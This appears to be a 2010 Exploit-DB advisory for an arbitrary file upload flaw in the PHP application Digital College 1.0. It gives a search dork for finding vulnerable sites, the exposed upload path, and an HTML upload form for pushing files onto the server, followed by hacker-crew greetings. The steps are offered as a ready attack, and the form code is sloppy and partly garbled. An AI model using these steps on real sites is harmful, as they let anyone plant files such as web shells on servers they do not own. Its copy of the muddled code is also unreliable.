Digital College 1.0 - Arbitrary File Upload

EDB-ID:

12568

CVE:

N/A




Platform:

PHP

Date:

2010-05-11


========================================================================================                  
| # Title    : Digital College 1.0 upload Vulnerability   
| # Author   : indoushka                                                               
| # email    : indoushka@hotmail.com                                                                                                                                                                    
| # Dork     : Powered by Digital College 1.0 - Magtrb Soft 2010                                                                                                                 
| # Tested on: windows SP2 Français V.(Pnx2 2.0)        
| # Bug      : Upload  
| # Download : http://www.magtrb.com/                                                                   
======================      Exploit By indoushka       =================================
# Exploit  :  

1 - Go To http://127.0.0.1/upload/includes/js/files/

2 - use the Simple example

you need to Creat a simple file uploader whith html lang and upload it to the sever
==================================================
<html>
<head><title>File Upload Tester</title></head>
<body>

<form  enctype="multipart/form-data" action="test.html" method="post">	
<tr>
  <td  valign="top" align="center">
	<table border=0 align="center" cellpadding=3>
	<tr><td><input type="file" name="userfile[0]"></td></tr>
	<tr><td><input type="file" name="userfile[1]"></td></tr>
	<tr><td><input type="file" name="userfile[2]"></td></tr>
	<tr><td colspan=2 align="center">
		<input type="hidden" name="sessionid" value="<?= $sid ?>">
		<input type="submit">
	</td></tr></table>
</td>
</tr>
<tr><td>
<p  align="center">Please visit <a href="">http://www.iqs3cur1ty.com</a> by indoushka. 
</p>


</table>


</form>

</body>
</html>
==============================================================

3 - http://127.0.0.1/upload/includes/js/files/upload.php (2 Upload)

    http://127.0.0.1/upload\includes\js\files\files\uploader.html    (2 Find It)

Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
all my friend :
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
------------------------------------------------------------------------------------------------------------------------